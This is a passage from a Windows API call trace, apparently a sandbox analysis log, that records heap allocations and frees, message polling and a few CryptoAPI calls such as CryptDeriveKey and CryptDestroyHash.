Size=0x8) returned 0x2e54e78 [0153.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0153.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0153.542] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0153.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0153.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0153.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0153.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0153.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0153.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0153.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0153.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0153.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0153.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0153.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0153.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0153.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0153.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0153.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0153.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0153.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0153.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0153.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0153.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0153.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0153.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0153.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0153.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0153.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0153.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0153.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0153.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0153.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0153.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0153.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0153.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0153.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0153.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0153.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50a70 [0153.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50a70, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0153.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0153.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0153.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0153.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0153.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0153.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0153.544] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87050, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87250) returned 1 [0153.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0153.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0153.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0153.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0153.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0153.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0153.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0153.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0153.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0153.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0153.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0153.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0153.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0153.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0153.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0153.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0153.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0153.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0153.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0153.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0153.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0153.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0153.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0153.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0153.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0153.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0153.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0153.545] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0153.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0153.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0153.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0153.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0153.545] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.546] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0153.546] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0153.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0153.546] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0153.546] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0153.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0153.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0153.546] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0153.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0153.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0153.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509e0 [0153.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0153.546] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0153.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0153.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0153.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0153.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0153.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0153.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0153.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0153.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0153.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0153.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0153.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0153.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0153.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0153.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0153.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0153.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0153.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0153.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0153.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0153.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0153.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0153.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0153.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0153.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0153.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0153.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0153.547] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0153.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0153.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0153.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0153.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0153.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0153.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0153.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0153.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0153.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0153.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0153.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0153.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0153.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0153.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0153.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0153.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0153.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0153.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0153.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0153.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0153.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0153.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69c28 [0153.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69c28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0153.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0153.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0153.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0153.548] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0153.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0153.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0153.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0153.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0153.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0153.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0153.548] CryptDestroyHash (hHash=0xa87050) returned 1 [0153.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0153.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0153.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0153.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0153.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0153.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0153.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0153.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0153.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0153.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0153.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0153.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0153.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0153.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0153.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0153.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0153.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0153.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0153.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0153.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0153.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0153.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0153.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0153.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0153.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0153.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0153.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0153.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0153.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0153.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0153.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0153.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0153.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0153.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0153.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0153.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0153.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0153.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0153.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0153.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0153.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0153.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0153.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0153.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0153.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0153.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0153.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0153.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0153.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0153.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0153.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0153.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0153.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0153.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0153.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0153.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0153.550] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0153.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0153.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0153.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0153.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0153.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0153.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0153.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0153.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0153.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0153.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0153.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0153.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0153.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0153.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0153.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0153.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0153.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0153.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0153.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0153.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0153.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0153.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0153.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0153.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0153.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 